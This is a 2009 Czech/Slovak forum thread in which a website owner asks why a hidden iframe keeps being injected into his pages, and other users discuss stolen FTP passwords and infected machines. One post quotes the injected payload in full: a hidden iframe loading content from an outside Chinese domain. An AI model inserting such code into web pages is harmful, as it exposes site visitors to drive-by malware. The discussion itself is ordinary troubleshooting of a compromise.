| Autor | Zpráva | ||
|---|---|---|---|
| Matess Profil * |
#1 · Zasláno: 11. 6. 2009, 12:23:00
Ahoj
na mém webu se mi objevují viry (vkládá se mi tam nějaký <inframe>), ale problém je v tom, že já nepoužívám Total Comander. Stránky edituji přímo na serveru pomocí PSPadu. Heslo v něm mám uložené. Myslíte, že by mohl ten vir napadat i PSPad? Můžete mi to někdo potvrdit nebo vyvrátit? Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách. Jiná možnost mě prostě nenapadá. Díky za vaše nápady a rady. |
||
| vynalezce Profil |
#2 · Zasláno: 11. 6. 2009, 12:41:47 · Upravil/a: vynalezce
co chyba v kodu?
pouzivas php? napadat pspad? rekl bych ze klidne |
||
| Chamurappi Profil |
#3 · Zasláno: 11. 6. 2009, 13:31:15
Reaguji na Matessa:
Já bych na místě autora viru „upgradoval“ knihovnu pro síťovou komunikaci, aby mi hlídala veškeré dění na FTP protokolu. Pak bych se nemusel starat o to, kdo používá jakého FTP klienta a kdo si jak šifruje uložená hesla… „Jiná možnost mě prostě nenapadá.“ Asi je to hloupá otázka, ale odvirovat svůj stroj jsi zkoušel? Jsi jediný, kdo má heslo k FTP? |
||
| Matess Profil * |
#4 · Zasláno: 11. 6. 2009, 13:57:54
Chamurappi
„Asi je to hloupá otázka, ale odvirovat svůj stroj jsi zkoušel? Jsi jediný, kdo má heslo k FTP?“ Ano prvně jsem ho zformátoval a pak i projel antivirem. Ano jsem jediný kdo má heslo k FTP. |
||
| Radek9 Profil |
#5 · Zasláno: 11. 6. 2009, 14:01:44
Můžeš nám říct o jaké viry se jedná? JS? Popřípadě i kus kódu.
|
||
| Matess Profil * |
#6 · Zasláno: 11. 6. 2009, 17:01:47
Radek9
To víš, že můžu. Je to nějaký trojský kůň (hlásí mi to Avast). A na stránky mi to vloží tento kod: <iframe src="http://lotwager.cn:8080/ts/in.cgi?pepsi56" width=125 height=125 style="visibility: hidden"></iframe> |
||
| Radek9 Profil |
#7 · Zasláno: 11. 6. 2009, 18:23:11
Matess
Známá klasika. Samé čínské stránky. Zkus pomocí PSPadu ukládat na jiný server. Pokud virus bude i tam, máš něco s pspadem. |
||
|
Časová prodleva: 6 dní
|
|||
| pollo22 Profil |
#8 · Zasláno: 17. 6. 2009, 09:38:27 · Upravil/a: pollo22
Matess
Akého FTP klienta používaš? na 99% je to ním... Opdporúčam ti používať filezilla |
||
| Chamurappi Profil |
#9 · Zasláno: 17. 6. 2009, 11:04:08
Reaguji na pollo22:
„Akého FTP klienta používaš? na 99% je to ním...“ Sám FTP klient tohle nikdy způsobit nemůže. Dělá to virus. Je jen otázka, kde se ta potvora skrývá, když si je Matess jistý, že v jeho počítači ne. |
||
| pollo22 Profil |
#10 · Zasláno: 17. 6. 2009, 12:57:41
Chamurappi
No nehovorim že to spôsoby on. Ale ako programator som mal veľa skusenosti stym že uložene hesla napr v TotalComanderi sa daju ľachko zystiť no a potom už vyrus infikuje stranku. pomôže iba poriadny ftp klient a zmena hesiel.... |
||
| Bubák Profil |
#11 · Zasláno: 17. 6. 2009, 20:25:03 · Upravil/a: Bubák
pollo22
Podivná logika. To je, jako bys trestal znásilněné ženy, protože si za to můžou samy. Ostatní ženy by se pak bály chodit vyzývavě oblečené a koketovat s chlapama. Ještě dodám, pokud bych měl zavizovaný počítač a byl bych nucen co nejrychleji aktualizovat web, použiju nějaký malý Live Linux a aktualizaci přes FTP udělám v něm. Ostatně není špatné mít aspoň jedno záchranné Live CD po ruce. |
||
| imploder Profil |
#12 · Zasláno: 17. 6. 2009, 20:30:15
Matess
Změnil sis hesla? Je možné, že virus sice není v tvojem počítači, ale když tam dřív byl, tak odeslal hesla do svojí sítě a teď se k tobě na FTP dostává (pokud máš pořád stejné heslo co tehdy) z jiných napadených počítačů. |
||
| Chamurappi Profil |
#13 · Zasláno: 17. 6. 2009, 20:39:27
Reaguji na pollo22:
Matess psal: „problém je v tom, že já nepoužívám Total Comander.“ Reaguji na implodera: Matess psal: „Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách.“ Reaguji na Bubáka: Předchozí verze tvého příspěvku mi nepřipadala špatná. |
||
| _es Profil |
#14 · Zasláno: 17. 6. 2009, 20:41:15
Matess
„Zformátoval jsem PC, nahrál jsem novou verzi PSPadu, změnil heslo k FTP a stejně se mi za týden opět objevil na stránkách. “ Nespúšťal si potom nič, kde by mohol byť vírus? Poznal som jedného, čo už keď musel v dôsledku vírusov celý systém nainštalovať znovu, tak potom z toho istého hardisku spúšťal hry, lebo "si predsa nezmaže také dobré hry". |
||
| Bubák Profil |
#15 · Zasláno: 17. 6. 2009, 21:35:07 · Upravil/a: Bubák
Chamurappi
Koukám, že jsem udělal chybu při editaci (překlik?), pohrabu v paměti, co jsem to původně napsal. Dodatek: Snad se mi to povedlo. |
||
|
Časová prodleva: 15 let
|
|||
0